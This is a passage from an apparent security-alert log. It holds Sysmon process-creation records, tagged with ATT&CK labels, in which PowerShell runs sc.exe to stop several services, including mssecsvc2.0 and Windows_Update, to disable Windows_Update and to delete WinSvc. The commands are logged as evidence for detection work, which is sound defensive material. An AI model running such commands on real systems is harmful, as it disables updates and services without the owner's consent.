14:20:29.548",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:00.515 +ProcessGuid: {df9fc3d3-b3f0-5ecf-0000-00102e5b2e00} +ProcessId: 7876 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop SvcNlauser +CurrentDirectory: 
C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop SvcNlauser",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:00.581890600Z"",""eventRecordID"":""3443"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:00.515\r\nProcessGuid: {df9fc3d3-b3f0-5ecf-0000-00102e5b2e00}\r\nProcessId: 7876\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop SvcNlauser\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:00.515"",""processGuid"":""{df9fc3d3-b3f0-5ecf-0000-00102e5b2e00}"",""processId"":""7876"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop SvcNlauser"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:29.421",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:00.190 +ProcessGuid: {df9fc3d3-b3f0-5ecf-0000-0010f1562e00} +ProcessId: 7896 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 
(WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ""Windows Managers"" +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop \""Windows Managers\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:00.196949600Z"",""eventRecordID"":""3440"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:00.190\r\nProcessGuid: {df9fc3d3-b3f0-5ecf-0000-0010f1562e00}\r\nProcessId: 7896\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop \""Windows Managers\""\r\nCurrentDirectory: C:\\Users\\John 
Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:00.190"",""processGuid"":""{df9fc3d3-b3f0-5ecf-0000-0010f1562e00}"",""processId"":""7896"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop \\\""Windows Managers\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:29.124",8,"ATT&CK T1489: Stop Windows 
Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:00.093 +ProcessGuid: {df9fc3d3-b3f0-5ecf-0000-001048532e00} +ProcessId: 5996 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Windows_Update +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Windows_Update",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:00.097422800Z"",""eventRecordID"":""3437"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:00.093\r\nProcessGuid: {df9fc3d3-b3f0-5ecf-0000-001048532e00}\r\nProcessId: 5996\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating 
System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Windows_Update\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:00.093"",""processGuid"":""{df9fc3d3-b3f0-5ecf-0000-001048532e00}"",""processId"":""5996"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Windows_Update"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:29.089",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:00.074 +ProcessGuid: {df9fc3d3-b3f0-5ecf-0000-00105f522e00} +ProcessId: 7824 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config Windows_Update Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config Windows_Update Start= 
Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:00.077551000Z"",""eventRecordID"":""3436"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:00.074\r\nProcessGuid: {df9fc3d3-b3f0-5ecf-0000-00105f522e00}\r\nProcessId: 7824\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config Windows_Update Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:00.074"",""processGuid"":""{df9fc3d3-b3f0-5ecf-0000-00105f522e00}"",""processId"":""7824"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config Windows_Update Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:28.932",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:00.041 +ProcessGuid: {df9fc3d3-b3f0-5ecf-0000-0010bd502e00} +ProcessId: 4768 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop mssecsvc2.0 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop mssecsvc2.0",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:00.044936300Z"",""eventRecordID"":""3434"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:00.041\r\nProcessGuid: {df9fc3d3-b3f0-5ecf-0000-0010bd502e00}\r\nProcessId: 4768\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop mssecsvc2.0\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:52:00.041"",""processGuid"":""{df9fc3d3-b3f0-5ecf-0000-0010bd502e00}"",""processId"":""4768"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop mssecsvc2.0"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:28.841",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:59.954 +ProcessGuid: {df9fc3d3-b3ef-5ecf-0000-0010c04d2e00} +ProcessId: 3884 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop mssecsvc2.1 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop mssecsvc2.1",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:59.959342900Z"",""eventRecordID"":""3431"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:59.954\r\nProcessGuid: {df9fc3d3-b3ef-5ecf-0000-0010c04d2e00}\r\nProcessId: 3884\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop mssecsvc2.1\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:59.954"",""processGuid"":""{df9fc3d3-b3ef-5ecf-0000-0010c04d2e00}"",""processId"":""3884"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop mssecsvc2.1"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:28.711",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:59.905 +ProcessGuid: {df9fc3d3-b3ef-5ecf-0000-0010a54b2e00} +ProcessId: 5584 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete WinSvc 
